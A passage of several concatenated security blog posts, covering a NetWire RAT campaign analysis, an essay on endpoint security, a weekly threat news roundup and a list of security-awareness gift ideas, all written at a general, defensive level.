Additionally, registry keys are created to store the command-and-control (C&C) server’s IP address and save data used by the malware to operate on the infected device. Communication with the C&C server is performed over TCP port 3012.

What’s the NetWire RAT Up To?

Since this malware can be used by any group with any motivation, attribution is rather futile. What we did want to figure out was what the NetWire RAT campaign we detected was after this time.

Looking at some unencrypted strings found in memory, we identified a series of strings written in a foreign language, which appears to be Indonesian. Below is a screenshot from Google Translate showing a rough translation of the various identified strings. Many of these terms either relate to a login prompt, payment options, donations or the term “afterlife savings”:

Figure 1: Translated malware strings from recent NetWire RAT campaign

This term may relate to permanent life insurance for retirement purposes offered in some parts of the world.

From the overall look of it, this campaign is financially motivated and most likely being carried out by local fraudsters looking to rob account owners in various ways. Although we have not seen the complete post-infection flow, it may be followed up by a 419-type scam, or might also include social engineering or phishing pages to lure the victim to enter their banking credentials and enable the attackers to take over their accounts.

Recent campaigns in the wild show that the NetWire RAT is not the only malware being delivered via disk imaging file extensions. This was somewhat of a trend in late 2019, likely because the same spamming operators were distributing RATs for different threat actors.

Commercial Malware Abounds

Oftentimes, as security professionals, we hear about the larger and more impactful data breaches, ransomware attacks, and destructive campaigns, which are often carried out by sophisticated cybercrime gangs. But while most financially motivated cybercrime is the work of larger, organized crime groups, smaller factions are still very much in business, and they too target businesses to compromise bank accounts and steal money by using commercially available malware year-round.

Indicators of compromise (IoCs) and other information on how to protect networks from the NetWire RAT can be found on IBM X-Force Exchange.

The post New NetWire RAT Campaigns Use IMG Attachments to Deliver Malware Targeting Enterprise Users appeared first on Security Intelligence.

The need to achieve responsible enterprise security has taken center stage in enterprise IT management in recent years, precipitated by a deluge of public data breaches that damaged company reputations. However, lacking information on the most critical modern attack vectors, many organizations continue to rely solely on traditional virus scanning tools as their sole method of enabling endpoint security.

Many business professionals seem to cling to a common misconception that the implementation of a malware protection tool provides blanket protection against all potential security risks. The broad availability of free scanning tools and Window’s native Defender software has lulled individuals who are not particularly risk-conscious into a false sense of security when it comes to protecting their IT resources.

To be clear, it is certainly true that scanning and remediation tools for malware — including viruses, Trojans, ransomware and adware — continue to be critical components of any security arsenal. According to Enterprise Management Associates (EMA) research, 73 percent of surveyed organizations indicated they have been affected by a malware attack, and only 58 percent reported a high level of confidence that they can detect a malware incident before it causes a business-impacting event.

These challenges are only accelerating due to a new generation of advanced malware attacks that are designed to target specific environments or conditions and are more resistant to removal or cleanup. However, it is important to recognize that these threats represent only a portion of the total risks posed by the use of endpoint devices in modern business environments.

Learn more about endpoint security and mobile threat defense

Modern Endpoint Security Attack Vectors

Beyond the threat of malware infection, the broad reliance on distributed endpoint devices — including desktops, laptops, tablets, smartphones and wearables — poses a number of challenges to enterprise security assuredness. In traditional environments, endpoint devices (primarily desktops) and the applications and data they utilized were kept contained on controlled business networks.

Today, however, critical business IT services are distributed across numerous public and private cloud, web, and server-hosting environments. Additionally, the “mobile revolution,” which began a decade ago, introduced more portable endpoint devices, allowing users to access business IT services from any location at any time. The consequence of these foundational changes to IT service delivery is that there is no longer a secure perimeter within which business devices, applications and data can be protected. Instead, all IT services must be considered continuously at risk.

Unfortunately, many bad actors are far ahead of the curve in figuring out how to exploit a world of interconnected and poorly secured software and devices. Cryptojacking is a prime example of this. It occurred to some resourceful individuals that it would be much cheaper and easier to secretly leverage the processing power of millions of end-user devices by embedding code in common websites to perform free cryptocurrency mining activities, rather than to purchase and manage a dedicated server farm for this purpose.

As a result, the performance of business devices and, by extension, the productivity of business workers are being diminished to line the pockets of clandestine entrepreneurs. Additionally, the eminent portability of the most commonly used endpoint devices (tablets and smartphones) further reduces their inherent security. EMA research indicated that one out of every eight mobile devices and one out of every 20 laptops containing business data ends up lost or stolen.

These are only two examples of rapidly evolving endpoint security challenges that plague enterprise operations teams, and this trend is expected to accelerate with cyberterrorists leveraging the power of intelligence technologies such as machine learning to identify new weaknesses they can exploit.

The Biggest Threat to Endpoint Security

EMA recently noted that the most frequent consequence of a security breach is not a malware infection, but compromised business data. We live in an age when information is a commodity that can be bought and sold through both legal markets and shadowy outlets. The latter, of course, is the greater concern with critical data — such as user access credentials, Social Security numbers, bank account information and other sensitive information — regularly being auctioned on the dark web. Cyberattacks are no longer designed just to be a nuisance; they are the cornerstone of a high revenue-generating industry.

There are three principal methods through which data is compromised on an endpoint:

1. The first is through the use of invasive software, such as hidden code in applications and websites that collect and distribute data to remote systems without the knowledge of the users.
2. The second involves manipulating users into unwittingly granting nefarious actors’ access to devices and IT resources. This is most frequently accomplished with the use of phishing schemes that employ psychological inventiveness rather than technological proficiency.
3. The final method for compromising data on endpoint devices occurs when the user distributes the information themselves in an unsecure manner.

A Responsible Approach to Endpoint Security

Antivirus and other malware protection solutions can certainly help protect endpoint devices from related attacks, but they do very little natively to prevent data loss from other attack vectors. To responsibly ensure endpoint devices can securely perform business tasks, organizations must adopt a multifaceted approach to security that continuously monitors for inappropriate device activities and effectively controls access to enterprise data and resources.

To enable holistic visibility, configuration, status and contextual information should be collected on devices, processes and network activities. Intelligence technologies, such as analytics, language processing and machine learning, should be applied to collected details so that any potential security risks can be rapidly identified, and policy-based automated responses can be immediately implemented.

Of course, enterprise data is not a risk at all if it is never removed from secured locations in the first place. This can be accomplished with the use of resource isolation technologies, such as containerization, app wrapping, virtualization and browser isolation solutions. Data access and distribution controls are also enhanced with the introduction of strong identity and access management (IAM) capabilities. IAM platforms that are risk-based and governed by policy controls provide a strong first line of defense in any security implementation, particularly if they holistically leverage device information collected by endpoint and security management tools, as well as common intelligence technologies to accurately determine the level of risk associated with allowing an access event to occur.

Unified endpoint management (UEM) solutions designed to support all endpoints across an entire IT ecosystem offer the optimal platform from which to manage a diverse range of security processes. Comprehensive UEM solutions centrally support capabilities for data collection, reporting and alarming, data analysis, and automated response that are the hallmark of a responsible endpoint security approach. Solutions in this field are greatly advantaged if they can extend their security management capabilities through direct integrations with related platforms or by enabling integrations with the use of an API.

Effective endpoint security management requires a broad spectrum of key functionality that goes far beyond just malware detection, but with the right resources in place, organizations can ensure the secure utilization of enterprise IT services without unnecessarily limiting workforce productivity.

Discover new approaches to endpoint security

The post What Is the Biggest Challenge Facing Endpoint Security? Hint: It’s Not Malware appeared first on Security Intelligence.

Last week in security news, a researcher found that malicious actors had abused the details of a test credit card just two hours after he posted the information online. The security community also learned of a survey in which three-quarters of respondents said that they had required a password reset after forgetting one of their personal passwords in the previous three months. Finally, researchers tracked several new malware samples along with a now-fixed WhatsApp vulnerability.

Top Story of the Week: The Spread of Exposed Credit Card Data

David Greenwood, a security researcher on the ThreatPipes team, wanted to find out how information posted online spreads throughout the internet and dark web. So he purchased an anonymous, prepaid Visa credit card and posted its full credentials on several paste sites. He then sat back and waited.

It took all of two hours until digital attackers sprang into action. They did so by using bots and scripts to make small purchases using the credit card information from a well-known retailer located in the U.K.

Source: iStock

Also in Security News

• Poison Frog Backdoor Samples Discovered in Aftermath of OilRig Dump: After a group of actors dumped OilRig’s attack tools online, Kaspersky Labs decided to scan its archives for new and old malware samples. In the process, it discovered Poison Frog, a sloppily designed backdoor that masqueraded as the legitimate Cisco AnyConnect application at the time of discovery.
• Most Users Required a Personal Password Reset in the Last Three Months: In a recent study, HYPR found that 78 percent of full-time workers in the U.S. required a password reset sometime in the last three months after forgetting a personal password. The rate was slightly lower for work-related reset requests at just over half (57 percent) of respondents.
• Lazarus-Linked Dacls RAT Makes Waves by Targeting Linux Machines: Back in October, Netlab 360 came across a suspicious ELF file that shared certain characters employed by the Lazarus group. This discovery of the file, nicknamed Dacls, marked the first time that researchers have detected a Lazarus-created threat that’s capable of targeting Linux machines.
• U.S., EU Users Caught in the Crosshairs of Zeppelin Ransomware: Blackberry Cylance spotted threat actors using the newly discovered Zeppelin ransomware to selectively target technology and healthcare organizations in the U.S. and the European Union. Further analysis helped determine Zeppelin to be a member of the VegaLocker ransomware family.
• Dudell Malware Leveraged by Rancor Digital Espionage Group: Palo Alto Networks’ Unit 42 threat research team analyzed the recent attacks of Rancor, a digital espionage group that targeted at least one Cambodian government organization between December 2018 and January 2019. In the process, it discovered a new custom malware family it dubbed Dudell.
• Vulnerability Allowed Threat Actor to Crash WhatsApp on Phones in Shared Group: In August 2019, Check Point Software discovered a bug that enabled a malicious actor to implement a WhatsApp crash-loop on the devices of users in a shared group. The security firm subsequently disclosed this vulnerability to WhatsApp, whose developers issued a fix in update 2.19.246.
• Lateral Movement Used by BuleHero Botnet to Spread Malware Payloads: Researchers at Zscaler observed in their analysis of BuleHero that the botnet used port scanning, Mimikatz, PsExec and WMIC to spread laterally on an affected network. These techniques enabled the threat to distribute both the XMRig miner and Gh0st RAT to a larger number of machines.
• Various Attack Techniques Used by MyKings Botnet to Deliver Forshare: SophosLabs took a deep dive into the workings of the MyKings botnet and found that the threat used various attack techniques against vulnerable Windows servers to deliver Forshare malware. Those tactics included using steganography to conceal a malware payload within an image.

Security Tip of the Week: Focus on Data Protection

Security professionals can help organizations protect their valuable data by using artificial intelligence (AI)-driven tools and automated monitoring solutions to gain intelligent visibility into the network. They can then use that visibility to monitor for suspicious activity that could be indicative of a threat moving laterally across the network.

In support of this monitoring activity, security teams should also consider embracing a zero-trust model for the purpose of setting up micro-perimeters on the cloud and elsewhere.

The post Weekly Security News Roundup: Exposed Credit Card Details Abused Within 2 Hours appeared first on Security Intelligence.

Better personal security in everyday life isn’t something everyone considers — at least, not until something goes wrong. Securing home devices and personal accounts can be daunting for those who just aren’t that interested in the devices or cybersecurity. Learning the basics of personal cybersecurity is not the most appealing activity to everyone, and getting lectured by tech-savvy family members isn’t either.

Fortunately, there is a better way to teach cybersecurity. Giving the gift of better security can grant you an opportunity to discuss broader security topics in terms that specifically relate to your loved ones’ daily lives.

Here are six security awareness gifts for the person in your life who just isn’t that into security.

1. A New, More Secure Router

Home Wi-Fi security is an important part of overall personal cybersecurity that’s commonly overlooked. Default device passwords are often left unchanged after purchases, and owners aren’t always on the lookout for firmware updates. Older router models may also use outdated security protocols, so a new router can be a security awareness gift that secures the home network.

Gifting a new router may also mean spending part of your visit as a family tech support representative who reconnects devices and updates software. As painful as change might seem to your family members, a more secure home network will be worth the effort.

2. A Password Manager Subscription

Password reuse remains a gateway to multiple types of account information, especially as more personal record caches are being exposed online or sold on the dark web. Building better password habits and eliminating reuse can go a long way toward better personal security, and a password manager subscription can be a step in this direction.

As we all know, more secure passwords are but one of the many habits required to secure your digital world. Learning a new login workflow may not be for everyone, and new users may not like the change initially, but they may feel compelled to keep going if they understand how it can help them protect their accounts.

While risk and security vulnerabilities still exist, password managers are still a better tool than weak or reused passwords.

3. Encrypted File Storage/Backups

Ransomware gets a lot of press for good reason. A ransomware attack can result in total data loss when no backup exists, but secure file storage held locally or in the cloud can help eliminate much of the dread associated with data loss after a ransomware attack.

Giving the gift of an external encrypted storage device or a cloud-based encrypted backup service can grant your family members peace of mind. Knowing that important data will be secured even if your machine is overtaken by ransomware can ease worries over potential data loss.

4. Computer Monitor Privacy Filters

Privacy filters for monitors and laptop screens help protect your on-screen activity from prying eyes. They make it nearly impossible for someone to make out what’s on your screen unless they’re sitting right in front of it. Commuters and other travelers can benefit from this kind of physical barrier to their private information being displayed in public. Filters can also serve as a physical reminder to employ better personal security practices.

Privacy filters can be removed and may not protect against unauthorized access in cases where devices are stolen. If they’re used as part of an overall better approach to physical security and cybersecurity, however, they can decrease the likelihood of data loss during travel.

5. Anti-Malware and Ransomware Protection

Protecting against known malware threats and ransomware attacks is a must for personal devices. Not all family members are aware there are solutions to help prevent ransomware attacks. Coupled with an external or cloud-based encrypted backup, an anti-malware and ransomware service subscription can help protect your loved ones’ devices from attacks. Gifting several small security awareness gifts in this way can effectively build up defenses across a variety of otherwise vulnerable channels.

Bear in mind that false positive scan results and software bugs are possible when new definitions are installed, and this could be alarming to a user unfamiliar with anti-malware software. Teaching new users what to expect from their software (including potential bugs) may help to ease their minds.

6. A Virtual Private Network (VPN) Subscription

Virtual private networks (VPNs) can be a good way to separate and encrypt your own traffic away from everything else traveling with your data. They offer significantly more privacy and security compared to a standard internet connection.

As I’m sure you know, some security awareness gifts may require a little extra work. Finding an appropriate VPN service that is maintained by a reputable company might be a challenge. Also, VPNs can be very helpful but no device can be secured from every possible attack. Understanding a VPN’s role in overall security habits could help new users as they learn a new network connection workflow.

Teaching Better Security Through Useful Tech Gifts

Each of these gifts could include discussion around their purpose, which may provide a better way to teach cybersecurity. They all reinforce better security through physical means or by encouraging new habits, and they offer the new user an opportunity to learn more about cybersecurity, a topic they might otherwise neglect.

The post 6 Security Awareness Gifts for the Cybersecurity Unaware appeared first on Security Intelligence.